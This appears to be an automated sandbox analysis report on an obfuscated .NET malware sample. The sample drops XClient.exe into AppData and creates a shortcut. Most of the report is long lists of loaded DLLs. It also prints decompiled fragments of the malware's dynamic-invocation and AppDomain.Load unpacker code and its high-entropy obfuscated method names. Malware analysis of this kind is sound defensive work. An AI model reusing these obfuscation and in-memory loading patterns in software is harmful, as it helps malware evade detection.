Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: cryptbase.dll

Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5E5F29CE-E0A8-49D3-AF32-7A7BDC173478}\InProcServer32

Jump to behavior

Source: XClient.lnk.0.dr

LNK file: ..\..\..\..\..\XClient.exe

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: z0LTqIdZ4A.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: z0LTqIdZ4A.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: z0LTqIdZ4A.exe, d3LcwH2oCXS1LNcyJ6jdVni2ZBk.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{YCV7ab2LPxaLuviIDS5novDiuRrngLAO3wQF91AQHf.VrTwvZ40rp5SI4q0V8Nz71EiC1n1a8CIbyGlRtAymu,YCV7ab2LPxaLuviIDS5novDiuRrngLAO3wQF91AQHf.Rhff6XcenIGUdK5SaWOeMJrNZCGSFbEpAsw6bQbnEV,YCV7ab2LPxaLuviIDS5novDiuRrngLAO3wQF91AQHf.ppS9YzPGZUgGTaOScv9XNCTIGtwdtlRrGCxIiik8yB,YCV7ab2LPxaLuviIDS5novDiuRrngLAO3wQF91AQHf.lQgdmzqmxgu3NZCAD1lpyv4l85MS5d2jwlCAKWEc7Q,_699hB8OpAkzLHY74ohXhmfCMlX15Hp2AJaZBoeZWB2xFbrRKHMzCVubFaJI.sliIN3oBnbZy26r5f4sTmWIyPvls5s3gDOZZuapp3IrA9JgvOtQ1tx6rjfo()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: z0LTqIdZ4A.exe, d3LcwH2oCXS1LNcyJ6jdVni2ZBk.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{PEwhhc2TKbWORGz8gZolmnqYQZVHjW0hCJzp5tCt2T502pv4xq3ARi8jWzP[2],_699hB8OpAkzLHY74ohXhmfCMlX15Hp2AJaZBoeZWB2xFbrRKHMzCVubFaJI.cYmgUbtY9afFxDnXNWVuMBa0pBKwBwg12qUPcvNmTvS8j(Convert.FromBase64String(PEwhhc2TKbWORGz8gZolmnqYQZVHjW0hCJzp5tCt2T502pv4xq3ARi8jWzP[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: z0LTqIdZ4A.exe, d3LcwH2oCXS1LNcyJ6jdVni2ZBk.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { PEwhhc2TKbWORGz8gZolmnqYQZVHjW0hCJzp5tCt2T502pv4xq3ARi8jWzP[2] }}, (string[])null, (Type[])null, (bool[])null, true)
Source: XClient.exe.0.dr, d3LcwH2oCXS1LNcyJ6jdVni2ZBk.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{YCV7ab2LPxaLuviIDS5novDiuRrngLAO3wQF91AQHf.VrTwvZ40rp5SI4q0V8Nz71EiC1n1a8CIbyGlRtAymu,YCV7ab2LPxaLuviIDS5novDiuRrngLAO3wQF91AQHf.Rhff6XcenIGUdK5SaWOeMJrNZCGSFbEpAsw6bQbnEV,YCV7ab2LPxaLuviIDS5novDiuRrngLAO3wQF91AQHf.ppS9YzPGZUgGTaOScv9XNCTIGtwdtlRrGCxIiik8yB,YCV7ab2LPxaLuviIDS5novDiuRrngLAO3wQF91AQHf.lQgdmzqmxgu3NZCAD1lpyv4l85MS5d2jwlCAKWEc7Q,_699hB8OpAkzLHY74ohXhmfCMlX15Hp2AJaZBoeZWB2xFbrRKHMzCVubFaJI.sliIN3oBnbZy26r5f4sTmWIyPvls5s3gDOZZuapp3IrA9JgvOtQ1tx6rjfo()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: XClient.exe.0.dr, d3LcwH2oCXS1LNcyJ6jdVni2ZBk.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{PEwhhc2TKbWORGz8gZolmnqYQZVHjW0hCJzp5tCt2T502pv4xq3ARi8jWzP[2],_699hB8OpAkzLHY74ohXhmfCMlX15Hp2AJaZBoeZWB2xFbrRKHMzCVubFaJI.cYmgUbtY9afFxDnXNWVuMBa0pBKwBwg12qUPcvNmTvS8j(Convert.FromBase64String(PEwhhc2TKbWORGz8gZolmnqYQZVHjW0hCJzp5tCt2T502pv4xq3ARi8jWzP[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: XClient.exe.0.dr, d3LcwH2oCXS1LNcyJ6jdVni2ZBk.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { PEwhhc2TKbWORGz8gZolmnqYQZVHjW0hCJzp5tCt2T502pv4xq3ARi8jWzP[2] }}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.z0LTqIdZ4A.exe.12be9ac0.0.raw.unpack, d3LcwH2oCXS1LNcyJ6jdVni2ZBk.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{YCV7ab2LPxaLuviIDS5novDiuRrngLAO3wQF91AQHf.VrTwvZ40rp5SI4q0V8Nz71EiC1n1a8CIbyGlRtAymu,YCV7ab2LPxaLuviIDS5novDiuRrngLAO3wQF91AQHf.Rhff6XcenIGUdK5SaWOeMJrNZCGSFbEpAsw6bQbnEV,YCV7ab2LPxaLuviIDS5novDiuRrngLAO3wQF91AQHf.ppS9YzPGZUgGTaOScv9XNCTIGtwdtlRrGCxIiik8yB,YCV7ab2LPxaLuviIDS5novDiuRrngLAO3wQF91AQHf.lQgdmzqmxgu3NZCAD1lpyv4l85MS5d2jwlCAKWEc7Q,_699hB8OpAkzLHY74ohXhmfCMlX15Hp2AJaZBoeZWB2xFbrRKHMzCVubFaJI.sliIN3oBnbZy26r5f4sTmWIyPvls5s3gDOZZuapp3IrA9JgvOtQ1tx6rjfo()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.z0LTqIdZ4A.exe.12be9ac0.0.raw.unpack, d3LcwH2oCXS1LNcyJ6jdVni2ZBk.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{PEwhhc2TKbWORGz8gZolmnqYQZVHjW0hCJzp5tCt2T502pv4xq3ARi8jWzP[2],_699hB8OpAkzLHY74ohXhmfCMlX15Hp2AJaZBoeZWB2xFbrRKHMzCVubFaJI.cYmgUbtY9afFxDnXNWVuMBa0pBKwBwg12qUPcvNmTvS8j(Convert.FromBase64String(PEwhhc2TKbWORGz8gZolmnqYQZVHjW0hCJzp5tCt2T502pv4xq3ARi8jWzP[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.z0LTqIdZ4A.exe.12be9ac0.0.raw.unpack, d3LcwH2oCXS1LNcyJ6jdVni2ZBk.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { PEwhhc2TKbWORGz8gZolmnqYQZVHjW0hCJzp5tCt2T502pv4xq3ARi8jWzP[2] }}, (string[])null, (Type[])null, (bool[])null, true)

.NET source code contains potential unpacker

Source: z0LTqIdZ4A.exe, d3LcwH2oCXS1LNcyJ6jdVni2ZBk.cs	.Net Code: _6qTIUO76p0rGPnaifJ5N8qe4El8 System.AppDomain.Load(byte[])
Source: z0LTqIdZ4A.exe, d3LcwH2oCXS1LNcyJ6jdVni2ZBk.cs	.Net Code: ELDwLxrQVhiSt5k9HHDAqJ1QEXE System.AppDomain.Load(byte[])
Source: z0LTqIdZ4A.exe, d3LcwH2oCXS1LNcyJ6jdVni2ZBk.cs	.Net Code: ELDwLxrQVhiSt5k9HHDAqJ1QEXE
Source: XClient.exe.0.dr, d3LcwH2oCXS1LNcyJ6jdVni2ZBk.cs	.Net Code: _6qTIUO76p0rGPnaifJ5N8qe4El8 System.AppDomain.Load(byte[])
Source: XClient.exe.0.dr, d3LcwH2oCXS1LNcyJ6jdVni2ZBk.cs	.Net Code: ELDwLxrQVhiSt5k9HHDAqJ1QEXE System.AppDomain.Load(byte[])
Source: XClient.exe.0.dr, d3LcwH2oCXS1LNcyJ6jdVni2ZBk.cs	.Net Code: ELDwLxrQVhiSt5k9HHDAqJ1QEXE
Source: 0.2.z0LTqIdZ4A.exe.12be9ac0.0.raw.unpack, d3LcwH2oCXS1LNcyJ6jdVni2ZBk.cs	.Net Code: _6qTIUO76p0rGPnaifJ5N8qe4El8 System.AppDomain.Load(byte[])
Source: 0.2.z0LTqIdZ4A.exe.12be9ac0.0.raw.unpack, d3LcwH2oCXS1LNcyJ6jdVni2ZBk.cs	.Net Code: ELDwLxrQVhiSt5k9HHDAqJ1QEXE System.AppDomain.Load(byte[])
Source: 0.2.z0LTqIdZ4A.exe.12be9ac0.0.raw.unpack, d3LcwH2oCXS1LNcyJ6jdVni2ZBk.cs	.Net Code: ELDwLxrQVhiSt5k9HHDAqJ1QEXE

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_00007FFD9B76D2A5 pushad ; iretd	1_2_00007FFD9B76D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_00007FFD9B955602 pushad ; iretd	1_2_00007FFD9B955621
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_00007FFD9B952316 push 8B485F94h; iretd	1_2_00007FFD9B95231B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_00007FFD9B77D2A5 pushad ; iretd	4_2_00007FFD9B77D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_00007FFD9B8911FA push E95CA005h; ret	4_2_00007FFD9B891239
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_00007FFD9B962316 push 8B485F93h; iretd	4_2_00007FFD9B96231B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_00007FFD9B78D2A5 pushad ; iretd	7_2_00007FFD9B78D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_00007FFD9B8ABA7A push E85B37D7h; ret	7_2_00007FFD9B8ABAF9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_00007FFD9B8AB9FA push E85B37D7h; ret	7_2_00007FFD9B8ABAF9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_00007FFD9B8A19D8 pushad ; ret	7_2_00007FFD9B8A19E1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_00007FFD9B972316 push 8B485F92h; iretd	7_2_00007FFD9B97231B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFD9B77D2A5 pushad ; iretd	11_2_00007FFD9B77D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFD9B89097D push E95B39D0h; ret	11_2_00007FFD9B8909C9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFD9B89091D push E95B39D0h; ret	11_2_00007FFD9B8909C9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFD9B967371 push eax; ret	11_2_00007FFD9B967369
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFD9B962316 push 8B485F93h; iretd	11_2_00007FFD9B96231B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFD9B967342 push eax; ret	11_2_00007FFD9B967369

Source: z0LTqIdZ4A.exe, IvE5nCV3nYLNULOm9h9lh8FE60P5fkYMEivyKE3fKLBdX.cs	High entropy of concatenated method names: '_3wkkvZc3ILzxfnGVWgQaM5dy7OOOv8l1uSQ5HPD0yNnOX', 'gOT9kMGIRQEqQQQhJyHXw4Wnw4pERGp8Oh1Zp6rr0lRmk', 'g57injr5JLMCuzd3lAncm78uqqtKiEFXw7aWyFnOIh9PX', 'aDDZEfJiRZTfjMgU0KCTRs9fJdZLBRzO1lKr8scmpoL1HG8Ko0245x', '_5c6vvPDQdiAUF0zBRNrYpH8IxeGCijltY8cHeqbGmX0ExTpI7rpgYQ', 'Lja9TjCBR3FFEl8JAfCUpBPf21zU7QULk8dbCPPlwtbbfePcdXDKzh', 'DMRt2ZPXdMgJrvBwkmsPthRQd01GWMKXyGOlWAfgl8wyj8095dx31E', 'jH0slgldyl3ffYd3UuCBHHfLP0AZsReyYcRaLJ1cl7gruzD1SWyIco', 'uRgPZAoqJ8BXUqmw70ZTOOHQ0ler0azlNzH8o2WlqZjDxGzmvnUQzI', 'nTqYw71CwhCt53vMN7nAdAnITIVpcwtLYurj6wE3FpzR8c8DtBGh8A'
Source: z0LTqIdZ4A.exe, DU364AQJ3HN1eTkTyIG4haISJOO3fiP4Qbs2GuUKzx.cs	High entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'qMMcYRZL5W5EWn0PQb3sDwATsKYtjOdiJptPQIaULlhWnxDXg0QaWvjZQBD2z8ptI4xSWFbazxbMG', 'CqmQBJBADvxs3OqNVGGsZ5oNJkrNufDExczkfLGgPDWtXepOwg7Hz2si14ucSHgzDmo12017qiBCd', 'Md4jj8Ljlou73br0jl07P1qwmNTwroCVB3AKH7OusXNekwBYpnPe13cOFKv5xFLldEAbUVOkARUkk', 'IbhYZXRHWtZQXcNseoLOaB5hdsFHboCJV38jr5czy6wNrzkWpDVq7jYr2Pr4vWfQUwT19QBxodRNn'
Source: z0LTqIdZ4A.exe, 699hB8OpAkzLHY74ohXhmfCMlX15Hp2AJaZBoeZWB2xFbrRKHMzCVubFaJI.cs	High entropy of concatenated method names: '_8BAhZLu0bagKwDnyy5VPbTkx9J5uVCOuQ4glO3NDfxskIBg4AQF2b5hMIrz', 'TkwO5hTgqQrmhzgpAKuNR3yGNfwdq0TZV36Fxh5DAmU4lWCkscr4Rn4SEJ7', '_3enrPWsbY3nj8vOIZUS6yHxjAB5GOsGA8VQuNCBiRcakhzXMifU3IvcthuY', 'lCGJLbMUDi4FHKmEbCsUnzDJN1UckCi0qp25Xmdd5knch7HRmlJnmfhMOA7', 'eKxoN90V33AKT7jn4lYiWc8zdNBzOgqxScNGUVEC0ORg8iiIxYbCr7x0uCs', 'GUOEc0bV0XFaLXrIqG2sZcK4oDhckCWF3GN7kWNLEIuU3ATAOLt3KEjXWDX', 'KSRQYL2ynnIKyhfKyhoRiDgXwiDGRrhbFOaBWLe6L9itpynAfWLBWL9YugZ', 'YELbu4ZDtIalBSu6GmeHUd6CJhaCtLI7j5DgfRVOWQCSOUKOFa1FxdH02kX', 'HEXR6yxmKpT05rUCBeXb7K3aBbQq73v6pffdXCBYubcFULYzraBa6a0YQ0V', 'oCqgLU9qsZgITmHn4c0ZphaDqlhCPx8nbOwtNDfrTRQlBNhPU6TkOUuXPsc'
Source: z0LTqIdZ4A.exe, d3LcwH2oCXS1LNcyJ6jdVni2ZBk.cs	High entropy of concatenated method names: 'YhaQpleqbqctVxubr3dGI5kcHYW', '_6qTIUO76p0rGPnaifJ5N8qe4El8', 'zWbsUS6rt1G2D4709g5wkNJvYnS', 'BW9yCMsV7kkFRLlrHlNGg8hYYZr', 't4BcSaxt7gdOu3MtLrVtM73FkvT', 'ykhouKtPf2ZVFGVYSFO80qDPCjR', 'codwjAI7zDoOD5ZIpJ5Ve4LWBqw', '_0Otaxz2bEZBMYT6fyPHJpXMRYD6', 'aZnrFrNfIB3J8wL92fxkDd7HdSX', 'RoTtAfwANIVrXqPYy5VnhIs4Hgc'
Source: z0LTqIdZ4A.exe, s5SbpqXq8zLP8EdiRwmo3WoZE4GaMKOwbQLylyOoFElpkMcOZvuOEE6LgcL.cs	High entropy of concatenated method names: 'gzWbMVqyjFIlrsGLrx64gbIH4mhiudqxbJAojsbeeS8nrdNcj3LctxAHRNE', 'VzwKjASLTrfd5tINXRi5mcquj9dF8ruAf4beTfBMCe6OQciTWraF4BgWd1l', 'X8UvH5VTAbUa9P3LzcYysHDerrs1pwmAgLrPmMCIJpUG5jEeVrRny0ERADY', 'BLSbs6FoYIG222pjkpJz6SA93G85cPD0D6inwMZZdlabl7afMNyWufhWZyX', '_2cVeB9gLkUaSPGeRvW7FPfghTossGPEvr99zF', 'RFnHzaT5z4xTUbV9XFYfeyJ8SsCZSuk81MX5J', '_5gXiLU4gC9RYYkOF53bkA6cbnDcFnSYyiNrid', 'ahrWXr0eZ7mEdTrZmKNdP9I6o3fUeaMSqqT7L', 'gcq8YVX8YkJfKigRm15FKra2ZJo4NoSEJ7Elb', 'dEtTzlGmKbxnYpbxQ9KjqHeOeaA1nEUbsCnzV'
Source: z0LTqIdZ4A.exe, gbzJjhDKIEAJEh9vZeIt06VVbEcLfda4VLlKKKxltiHCXQlUC6MTsAiz1AS.cs	High entropy of concatenated method names: 'AddClipboardFormatListener', 'SetParent', 'IcdXS9ik8uzbLFXKdjcloxYmBrnIs2boOF5Noclgm2DBn7HEFYNECHL5kzW', 'DSNwvOHsm7zQHPm9khYthdiIWoBgY61UKxhSu6zCoao8KD3yC7iM1ySmUgPJdYNzJD2Rd3LcyzfjS5qwg6Xg3Yf5rLB4oy', 'f2mK5YtlyB7amB6EBaZgUHKQmEnbDz6K6uiWLEwldKfuJLaHbH1vpaBRKw9WKtpoC8XHZz7mLXYxNzKiXOQMJqhrgZzeWZ', 'aAoQValFbp84BzzfcfeuMgT0xBMvKTFCUsrsGLiiK80ak51sbUrFmqf3LTbpeKvmGnVwiLQZ1ngT3811PgqhSwG222W0Bf', 'scm6acwoZsD2NeogRXgQBz88NmPOPgvJzUeUP618e10iLo66cxogrBoarm0IBWk7tnQdTkz78bZLovLzABsnP9LUoQMOwo'
